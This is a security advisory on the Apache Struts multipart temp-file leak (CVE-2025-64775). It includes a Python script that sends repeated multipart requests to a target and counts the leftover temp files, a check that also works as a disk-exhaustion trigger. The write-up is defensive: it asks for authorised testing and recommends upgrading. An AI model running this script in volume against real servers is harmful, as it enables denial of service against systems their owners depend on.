Apache Struts Denial of Service Vulnerability Allows Disk Exhaustion Attacks (CVE-2025-64775)

The Apache Software Foundation disclosed a denial of service vulnerability in Apache Struts on December 1, 2025 (bulletin updated December 10). The flaw (CVE-2025-64775, together with the related CVE-2025-66675) lets an attacker exhaust the server's disk space by triggering a temporary-file leak in multipart request processing.

Details of the Vulnerability

The issue is a file leak in the multipart request handler: the temporary files that Struts creates for regular (non-file) fields of a multipart request are not deleted once the request has been processed. Every such request therefore leaves data behind on disk, and an attacker who repeats the request can fill the filesystem until the application, or the host it runs on, stops working.
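The following Python script is an added example for checking a deployment, not code from the Apache Struts project or from the bulletin. It builds a multipart/form-data body that contains only regular form fields (the request shape the bulletin describes), posts it a number of times, and reports which files appeared in the multipart temp directory and were still there afterwards. It assumes you know that directory (Struts exposes it as struts.multipart.saveDir and otherwise falls back to the servlet container's temp directory), and the endpoint URL, field names and file names used here are placeholders.

```python
"""Check a Struts deployment for the multipart temp-file leak (CVE-2025-64775).

Added example, not project code. Assumptions (not from the bulletin):
  - TMP_DIR is the directory the application uses for multipart temp files
  - TARGET is any action that accepts multipart requests; field names are arbitrary
"""
import os
import time
import urllib.request
import uuid

TARGET = "http://localhost:8080/app/form.action"   # placeholder
TMP_DIR = "/tmp/struts-multipart"                   # placeholder


def build_multipart_body(fields, boundary=None):
    """Return (content_type, body) for a multipart/form-data request that
    carries only regular fields and no file parts. Values may be str or bytes."""
    boundary = boundary or uuid.uuid4().hex
    lines = []
    for name, value in fields.items():
        lines.append(f"--{boundary}".encode())
        lines.append(f'Content-Disposition: form-data; name="{name}"'.encode())
        lines.append(b"")  # blank line separates part headers from part body
        lines.append(value.encode() if isinstance(value, str) else value)
    lines.append(f"--{boundary}--".encode())  # closing delimiter
    lines.append(b"")
    return f"multipart/form-data; boundary={boundary}", b"\r\n".join(lines)


def snapshot(tmp_dir):
    """Set of (file name, size) for the files currently in tmp_dir."""
    return {
        (entry.name, entry.stat().st_size)
        for entry in os.scandir(tmp_dir)
        if entry.is_file()
    }


def leaked_files(tmp_dir, before):
    """Files present now that were not in the earlier snapshot, sorted by name."""
    return sorted(snapshot(tmp_dir) - before)


def post(url, content_type, body):
    """Send one multipart POST and return the HTTP status code."""
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", content_type)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def probe(url=TARGET, tmp_dir=TMP_DIR, requests=20, settle=2.0):
    """Post `requests` multipart bodies made of regular fields only, wait for
    any server-side cleanup, and return the temp files that remain."""
    before = snapshot(tmp_dir)
    ctype, body = build_multipart_body({"username": "a" * 4096, "comment": "b" * 4096})
    for _ in range(requests):
        post(url, ctype, body)
    time.sleep(settle)
    return leaked_files(tmp_dir, before)


if __name__ == "__main__":
    left = probe()
    print(f"{len(left)} temp file(s) left behind in {TMP_DIR}")
    for name, size in left:
        print(f"  {name}  {size} bytes")
```

A patched server should leave zero files behind once the requests have completed; a non-empty list after the settle period means the handler is not cleaning up, and multiplying the leaked bytes per request by the rate an attacker can sustain gives the time to disk exhaustion. Run it only against systems you are authorised to test, and with a small request count, since every request that leaks consumes real disk space.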

Impact and Recommendations

  • Causes disk exhaustion and denial of service
  • Affects file upload-enabled applications
  • No authentication required for exploitation
  • Upgrade to Apache Struts 6.8.0 or 7.1.1 immediately

Temporary files from regular form fields in multipart requests are not deleted, leading to rapid disk consumption. — Apache Struts Security Bulletin S2-068

Source and full details:

Read the official Apache Struts security bulletin here:

https://struts.apache.org/announce-2025.html
